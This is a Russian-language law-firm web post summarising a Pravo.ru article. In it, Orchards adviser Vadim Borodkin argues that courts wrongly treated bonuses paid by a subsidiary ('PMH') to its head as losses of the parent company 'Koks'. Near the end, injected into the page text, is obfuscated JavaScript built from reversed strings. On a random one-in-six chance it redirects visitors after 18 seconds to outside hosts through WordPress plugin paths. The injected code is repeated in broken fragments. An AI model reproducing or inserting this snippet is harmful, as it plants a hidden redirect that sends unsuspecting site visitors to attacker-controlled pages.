Расходы «дочки» или убытки материнской компании: суд оценит премию КДЛ

Комментарии советника Orchards Вадима Бородкина для Право.ru.

Как пишет Право.ru, корпоративный конфликт в угольной компании «Кокс» снова обострился. В крупном промышленном холдинге была особая система управления: одна «дочка» стала управляющей компанией для основных компаний группы. 16 лет вопросов ни у кого не возникало. А потом миноритарий материнской компании вдруг подал косвенный иск — потребовал у главы «управляющей» дочки вернуть зарплату за несколько лет. Две инстанции взыскали эти деньги в пользу материнской компании. То есть приравняли расходы дочернего общества к убыткам материнского. С этим не согласились, в том числе, акционеры другой «дочки». Такой подход позволяет материнской компании перераспределять активы внутри группы в свою пользу, утверждают они. А юристы объясняют, в чем опасность этого прецедента. 

По мнению Вадима Бородкина, советника Orchards, на втором круге первая инстанция и апелляция проигнорировали такие основополагающие признаки юрлица, как имущественная и организационная обособленность. Даже если исходить из того, что Зубицкий получал премии необоснованно, это убытки не «Кокса», а «ПМХ», объясняет эксперт. Ведь зарплату Зубицкому платило «ПМХ». 

Еще одной ошибкой Бородкин считает то, что суды взыскали убытки по формальному основанию: потому что не было решения общего собрания участников «ПМХ» о размере премий его руководителя. В тот момент у «ПМХ» был единственный участник — «Кокс», а им руководила сама «ПМХ». То есть решение о своей премии все равно бы принимал Зубицкий. Ведь именно он выступил от имени «ПМХ» в тех случаях, когда она представляла «Кокс».

Не было никаких оснований признавать убытками материнской компании выплаченные президенту дочернего общества премии. В том числе потому, что апелляция и первая инстанция посчитали размер такого вознаграждения рыночным, а значит справедливым. Раз Зубицкий получал справедливое вознаграждение, то у «Кокса» не было убытков, а взыскивать с Зубицкого премии рыночного размера нельзя.

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/235030/»>Читать полную версию статьи на сайте Право.ru.

Подпишитесь на Telegram Orchards

X